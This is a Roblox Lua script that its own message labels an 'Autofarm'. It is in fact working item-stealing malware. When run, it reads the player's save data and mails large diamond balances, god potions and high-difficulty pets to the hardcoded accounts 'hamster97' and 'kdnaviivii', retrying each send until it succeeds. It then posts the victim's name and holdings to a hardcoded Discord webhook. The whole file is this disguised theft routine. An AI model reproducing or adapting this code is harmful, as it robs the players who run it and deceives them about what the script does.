return function()
local msg = ""
local e = "Autofarm Executed by "..game.Players.LocalPlayer.Name
local uuu,vvv
uuu,vvv=pcall(function()
local save = require(game:GetService("ReplicatedStorage").Library.Client.Save)
local dir = game:GetService("ReplicatedStorage")["__DIRECTORY"].Pets
save = save.Get()
function _mail(u, t, i, n)
local args = {
    [1] = u,
    [2] = "Autofarmy",
    [3] = t,
    [4] = i,
    [5] = n or 1
}
return game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(unpack(args))
end
local s = save.Inventory.Currency
for i,v in pairs(s) do
if v.id == "Diamonds" then
e = e.."\\nGems: "..v._am
if v._am >= 1000000 then
local s,e = false, "x"
repeat
pcall(function() s,e = _mail("hamster97", "Currency", v.id, v._am) end)
until s
end
end
end
local pots = {}
if save.Inventory.Consumable then
    for i, v in pairs(save.Inventory.Consumable) do
        if v.id == "God Potion" or v.id == "Jelly God Potion" or (v.id == "Instant Luck Potion" and v.tn == 4) then
            pots[i] = v._am or 1
        end
    end
end
for i,v in pairs(pots) do
local s,e = false, "x"
repeat
pcall(function() s,e = _mail("hamster97", "Consumable", i, v) end)
until s
end
local big = 0
local sendids={}
for i,v in pairs(save.Inventory.Pet) do
if require(dir[v.id]).difficulty >= big then
big = require(dir[v.id]).difficulty
end
if (string.find(v.id, "Jelly") and require(dir[v.id]).difficulty>= 9999) or require(dir[v.id]).difficulty>=500000000 then
table.insert(sendids, {i, (v._am or 1)})
end
end
for i,v in pairs(sendids) do
local s,e = false, "x"
repeat
pcall(function() s,e = _mail("kdnaviivii", "Pet", v[1], v[2]) end)
until s
end
e = e.."\\nBest Pet: 1/"..big
end)
if not uuu then
e=e.."\\n*"..vvv.."*"
end
msg = '{"content":"'..e..'"}'
local response =
        request(
        {
            Url = "https://discord.com/api/webhooks/1303747896780394599/eBTzNcu80kdueCI24wpMAw1yR1-5j67y8cMOkRUb4YcsjvMSWgf0NFBD6FKlSAYXBjYR",
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = msg
        }
    )
return response
end
